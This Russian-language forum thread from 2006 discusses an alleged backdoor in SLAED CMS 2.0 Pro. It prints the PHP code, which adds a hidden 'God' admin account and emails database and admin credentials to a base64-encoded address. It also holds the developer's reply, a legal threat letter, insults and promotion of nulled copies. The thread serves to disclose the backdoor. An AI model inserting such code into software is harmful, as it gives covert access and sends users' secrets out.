Сообщений в теме: 5

[z0mb1e_c0mmad1ng]

SLAED CMS 2.0 и бекдор от Eduarda(Эдуард это разработчик системы)или вся правда о SLAED CMS

В лицензионной версии SLAED CMS 2.0 Pro был найден очень примечательный кусок кода в файле sources.php:

if (md5(md5($_GET['sec']))=="ceabfb42600ae4843d1e000bf59be77a") 

{ 

define("ADMIN_FILE",true);require_once("config/config_secure.php");$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");
mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);

}

Объясню суть этого кода, при определенном запросе, двойной md5 хеш которого развен "ceabfb42600ae4843d1e000bf59be77a"
( естественно Eduard знает изначальное значение данной строки ) выполняются следующие действия:

define("ADMIN_FILE",true); -

определяется константа доступа к админ файлам системы

require_once("config/config_secure.php");

- запрашивается конфигурационный файл

$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");

- добавляется новый админ с логином Security и правами God( пароль етесно знает Eduard )

Дальше идет отправка электронной почты с параметрами

mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);

base64_decode("aW5mb0BzbGFlZC5uZXQ=")

- есть info@slaed.net

Это легко проверить создав простейший PHP сценарий:

<?php

echo base64_decode("aW5mb0BzbGFlZC5uZXQ=);

?>

Далее

$adminmail

= адрес эл. почты администратора

base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/");

= строка "Нелегальная версия";

$dbhost - хост БД

$dbuname - имя пользователя БД

$dbpass - пароль к БД

$dbname - имя БД

$admin_file - имя файла админ панели

$license_key - лиц. ключ

$adminlogin - логин для доступа к админ панели( если используется http анунтефикация )

$adminpassword - пароль для доступа к админ панели( если используется http анунтефикация )

Тем самым Eduard получает полный доступ к сайту!!!

И где гарантия что он это будет делать только с теми кто пользуется пиратской версией....

Как вам не стыдно товарищ!

PS версия SLAED 2.0 Nulled by BlackNuller и AntiSlaed CMS не имеют данного кода.


Автор статьи Sidious.(AntiSlaed Team)

======
А вот ответ Эдуарда по данному вопросу

Бред!
На нашем сайте тот же код, кто реально сломает?

И так объясняю, клиентам боятся нечего!
А вот тем кто украл, стоит призадуматся, все ли нюансы были найдены ворами?!

Никто кроме автора (Тоесть меня) не сможет воспользоватся этой функцией!
Зделано специально для наказания воров!

====
Да,возможно разработчик решил боротся с пиратскими версиями,то есть тот кто украл,будет им наказан.Но это идет уже нарушение Прав потребителей,ведь этот бэкдор впаривается и тем кто покупал данную систему!!!!....
Любой бэкдор - это нарушение прав тех, кто покупает систему.
Просто никто не будет возиться с этой шнягой)
То есть данные он имеет и о тех кто купил эту систему,но им ничего не грозит как он заявляет.

====
Материал взят с Anti Slaed Teamwww.antislaed.info

=
теперь немного о Anti Slaed Team и о "разработчике" SLAED CMS.
Эдуард,русский программер проживающий в Германии,"разработчик" SLAED CMS(заметьте в ковычках)пару лет назад взял сорцы движка PHP Nuke,который шел и идет по лицензии GNU/GPL,переделал его немного-а в частности дописал кое какие блоки и улучшил некоторые модули.Закрыл баги PHP-Nuke.
Сделал легкий дизайн,и получился SLAED CMS,за которую он стал брать деньги.И скажу немалые.То есть сделал из GNU/GPL коммерческую,хотя сам он нихрена особого не сделал,спасибо разработчикам PHP Nuke.

Anti Slaed Team-Группа более умных программистов,которые начали с того что стали закрывать баги,сделанные Эдуардом при закрытии баг исходников PHP Nuke(смешно,закрыл одно-делал новые),в свою очередь который принимал все их советы и закрывал то,что ему указывали. Но позже когда Эдуард стал окончательно наглеть,Anti Slaed Team выдали всю правду о SLAED CMS.



====
Слова человека по имени JOXX(главного администратора ресурса www.antislaed.info)

По поводу бэкдора я запостил в его форуме для клиентов и мы получили следующий ответ "Если Вы сомневаетесь в нашей порядочности, то почему пользуетесь нашей системой". Логика потрясающая. Кстати глупость несусветная, признаваться в самовольном оставлении бэкдоров в клинтские сайты. Уж наврал бы чего.


Да он, как мне кажется завтрался уже на столько, что сам или запутался или внушил себе, что он все сам написал... Наверное скоро окажется, что и яндекс и гуг его работа... а нюка - это ваще его неудачное детище...

Теперь вывод

Эдуард(SLAED CMS-http://slaed.net) настоящее ЧМО,которое из GNU продукта сделало коммерческий,и теперь яростно защищает якобы свои права,хотя не думает о разработчиках Нюки(GNU/GPL),который он спер и немного переделал-прося за это бабло. Воспользовался трудом тех людей которые написали его и дали ему GNU/GPL.

[b]Anti Slaed Team(www.antislaed.info)Совет,почаще посещайте именно этот сайт. Именно там вы найдете еще много чего интересного про slaed cms,а также их нулленые бесплатные версии,в которых нет бэкдоров,которые туда понапихал "разработчик"-заметте в ковычках.

==
Все это равносильно тому,что допустим кто нибудь взял бы Linux,переделал его немного и стал просить за это бабки. Эпидемия "Билл Гейтса"-мочить таких надо
Сабж.

[Copoket]

Нуленая версия не есть хорошо! Пусть даже разработчик как вы сказали "Чмо". Тем более это еще доказать нада.
А может это все просто вирусная-реклама очередного варез-портала?

Так что наблюдение с третьей стороны: оба хороши...

Сообщение отредактировал Copoket: 20.09.2006, 17:23:19

[z0mb1e_c0mmad1ng]

Ну тут речь идет не о рекламе. Пост был создан хотя бы для тех-кто купил эту систему,в которой разработчик оставил бэкдор. Да,возможно так он борится с пиратсвом,но теже самые бэкдоры достаются и тем кто ее КУПИЛ.
Copoket,представьте себе,вы покупаете систему,а разработчик уже вкурсе о всех данных БД,и имеет админ доступ на сайт.
=
Ну а другого названия "разработчик" и не заслуживает,украсть GNU/GPL продукт,незначительно переделав его просить за это деньги.

Тут же опубликую письмо Эдуарда("разработчика"-в ковычках,SLAED CMS)к команде ANTI SLAED(www.antislaed.info) Чтобы понять ,прочитайте все=)

Уважаемые господа!


Поддерживая проект ANTISLAED.INFO и предоставляя данному проекту место для размещения на Вашем рессурсе, Вы не только подвергаете опасности Вашу репутацию и доброе имя Вашей фирмы, но и рискуете вступить в конфликт с Законодательной властью, со всеми вытекающими отсюда последствиями.

ANTISLAED.INFO, размещенный на Вашем сервере, проводит ассоциальную политику и впрямую нарушает ряд статей УК, в частности, следующие: ст. 146 УК РФ ?Нарушение авторских и смежных прав?, 147. Нарушение изобретательских и патентных прав, ст.138 УК РФ ?Интеллектуальная собственность?, ст. 20 Закона, от 23 сентября 1992 г. ?О правовой охране программ для ЭВМ и баз данных?, ст. 158 УК РФ ?О преступлениях против собственности?, Статья 129 ?Клевета?, Статья 130. ?Оскорбление?, ст. 158. ?Кража?, Статья 183. ?Незаконные получение и разглашение сведений, составляющих коммерческую или банковскую тайну?.

Даже если до сегодняшнего дня Вы не знали о противоправных действиях, совершаемых руководством сайта ANTISLAED.INFO, размещенного на Вашем сервере, с момента получения данного официального уведомления Вы более не имеете возможности ссылаться на незнание. Соответственно, отсутствие каких-либо действий, направленных на пресечения противоправной и асоциальной деятельности вышеупомянутой фирмы, может рассматриваться как соучастие и прямое пособничество данному юридическому лицу, и вся полнота ответственности по существующему Законодательству распространяется и на Вашу фирму тоже.

С данной минуты Вы поставлены в известность и предупреждены о происходящих нарушениях, и о возможности наступления уголовной ответственности за указанные действия.

С уважением,

Eduard Laas
SLAED CMS - Support

h**p://www.slaed.net
info@slaed.net

Ответ ANTI SLAED TEAM на это письмо

146 УК РФ ?Нарушение авторских и смежных прав?
147. Нарушение изобретательских и патентных прав
ст.138 УК РФ ?Интеллектуальная собственность?
Статья 129 ?Клевета?
Статья 130. ?Оскорбление?
ст. 158. ?Кража?
Статья 183. ?Незаконные получение и разглашение сведений, составляющих коммерческую или банковскую тайну?
ст. 20 Закона, от 23 сентября 1992 г. ?О правовой охране программ для ЭВМ и баз данных?

Поясняю...

146 - У тебя нет авторских прав завизированных документально и ты не можешь иметь авторские права на то, что украл из других систем.
147 - Опять же таки ТЫ не изобретал и не фиксировал изобретение... нет патента...
138 - Система под лицензией ГНУ не может являться твоей собственностью ибо это противоречит антимонопольному постановлению
129 - клевета. никто не врал. не врет. и врать не будет с проекта Антислаед, а если врали покажи кто и в чем. (Доказательства)
130 - никто тебя не оскорблял ( из саппорта антислад за пользователей ручаться не могу ибо у нас демократия, свобо слова.
158 - в данной статье речь идет о материальных ценностях, как ты заметил слаед не материальная ценность.
183 - Нет никакой коммерческой или банковской тайны в сладе ибо она распространяется, а не находится в состоянии закрытого доступа.
20 - Базы данных( вникни в эту фразу и прочти еще раз закон... )

Так что уважаемый Эдуард не пойму что вы мне прислали и к чему.
Законы Своей страны мы знаем и уважаем. НЕ надо думать, что если Вы нарушаете законы, то их нарушают все.


Целую. Скучаю. Жду ответа милый.
Поки Поки.

Вот так его и пригвоздили Тобишь если пустить дела вход,то виновным и нарушающим все права станет никто иной как сам Эдуард,который во первых нарушил лицензию GNU/GPL,взяв исходники PHP-Nuke за которые немного переделав стал просить бабки-а за нарушение GNU/GPL покарают жестоко
2. А разработчики PHP Nuke знают о данном явлении?НЕТ!!! :angry:

==
P.S. Тот кто покупал неизвестно что(Что шло по лицензии GNU),Обратите внимание,и удалите данные строчки,если не хотите чтобы "разработчик" имел доступ к Вашему сайту и БД

[Copoket]

Copoket,представьте себе,вы покупаете систему,а разработчик уже вкурсе о всех данных БД,и имеет админ доступ на сайт.

Совершено согласен, такое просто не допустимо.
Просто пока не тороплюсь занимать чью либо сторону, ведь Antislaed действует таким же грязным способом, изготовляя нуллы и публикуя для общего доступа опять же вредя разработчикам PHP Nuke. Так что они от него не сильно отличаютя

[Skull]

Эдик жгет

А молодым интузиастам желаю разработать свою ЦМС (которая полностью заменит Слаед по функционалу) и раздавать клиентам Слаеда, вот тогда это будет антислаед.

[Romiros]

Вчера скачал движок с сайта slaed.net - сегодня прочитал этото топик - в файле sourceы.php ничего подобного о чём писал автор не нашёл!

Похоже кончилась эпопея!